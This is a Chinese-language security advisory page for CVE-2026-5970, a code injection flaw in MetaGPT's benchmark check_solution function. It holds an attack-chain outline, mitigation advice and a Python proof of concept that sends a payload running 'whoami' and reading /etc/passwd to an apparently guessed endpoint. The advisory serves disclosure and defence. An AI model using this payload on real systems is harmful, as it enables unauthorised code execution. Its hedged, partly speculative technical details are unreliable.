CVE-2026-5970 CVSS 7.3 高危

CVE-2026-5970 FoundationAgents MetaGPT 代码注入漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5970

漏洞类型

代码注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

FoundationAgents MetaGPT

漏洞概述

FoundationAgents MetaGPT 0.8.1及之前版本中存在严重的代码注入漏洞。该漏洞位于HumanEvalBenchmark/MBPPBenchmark组件的check_solution函数中，由于缺乏对输入数据的严格过滤，攻击者可远程注入恶意代码。攻击无需用户交互及认证即可成功利用，进而可能导致系统被完全控制。目前利用细节已公开，官方尚未发布修复补丁。

技术细节

该漏洞的核心在于MetaGPT框架中的基准测试组件（HumanEvalBenchmark/MBPPBenchmark）的check_solution函数。在验证生成的代码解决方案时，该函数可能直接使用了不安全的执行方式（如Python的exec()或eval()函数）来运行测试用例。由于未对传入的代码内容进行严格的清洗或沙箱隔离，攻击者可以通过构造包含恶意Python代码的输入数据，欺骗该函数执行系统命令或读写敏感文件。攻击向量为网络，无需任何认证即可触发，这使得攻击者能够利用此漏洞在运行MetaGPT的服务器上实现远程代码执行（RCE）。

攻击链分析

STEP 1

侦察

攻击者识别互联网上暴露的FoundationAgents MetaGPT服务接口。

STEP 2

武器化

攻击者构造包含恶意Python代码的数据包，旨在调用系统命令。

STEP 3

投递

攻击者通过HTTP请求将恶意负载发送至目标服务器的check_solution接口。

STEP 4

利用

目标服务器在处理请求时，通过不安全的函数执行了恶意代码。

STEP 5

影响

攻击者在服务器上获得执行权限，可能导致数据泄露或服务器被控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL where the vulnerable check_solution endpoint resides
target_url = "http://target-metagpt-instance/api/benchmark/check"

# Malicious payload designed to inject code
# This payload attempts to read a file or execute a shell command
payload = """
import os
# Execute a system command (e.g., whoami)
os.system('whoami')
# Or read a file
# with open('/etc/passwd', 'r') as f: print(f.read())
"""

data = {
    "solution": payload,
    "test_cases": "[]"
}

# Sending the request
try:
    response = requests.post(target_url, json=data)
    print(f"Status Code: {response.status_code}")
    print("Response from server:")
    print(response.text)
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

FoundationAgents MetaGPT <= 0.8.1

防御指南

临时缓解措施

建议立即检查MetaGPT部署环境，临时禁用HumanEvalBenchmark和MBPPBenchmark相关功能。在网络边界限制对相关API端口的访问，仅允许受信任的内部IP调用。若需使用代码执行功能，应在隔离的沙箱容器（如Docker）中运行，并禁用敏感系统调用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5970
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5970
3 Details https://www.cvedetails.com/cve/CVE-2026-5970/
4 VulDB https://vuldb.com/cve/CVE-2026-5970
5 Link https://github.com/FoundationAgents/MetaGPT/
6 Link https://github.com/FoundationAgents/MetaGPT/issues/1942
7 Link https://github.com/FoundationAgents/MetaGPT/pull/1988
8 Link https://vuldb.com/submit/791693
9 Link https://vuldb.com/vuln/356524
10 Link https://vuldb.com/vuln/356524/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表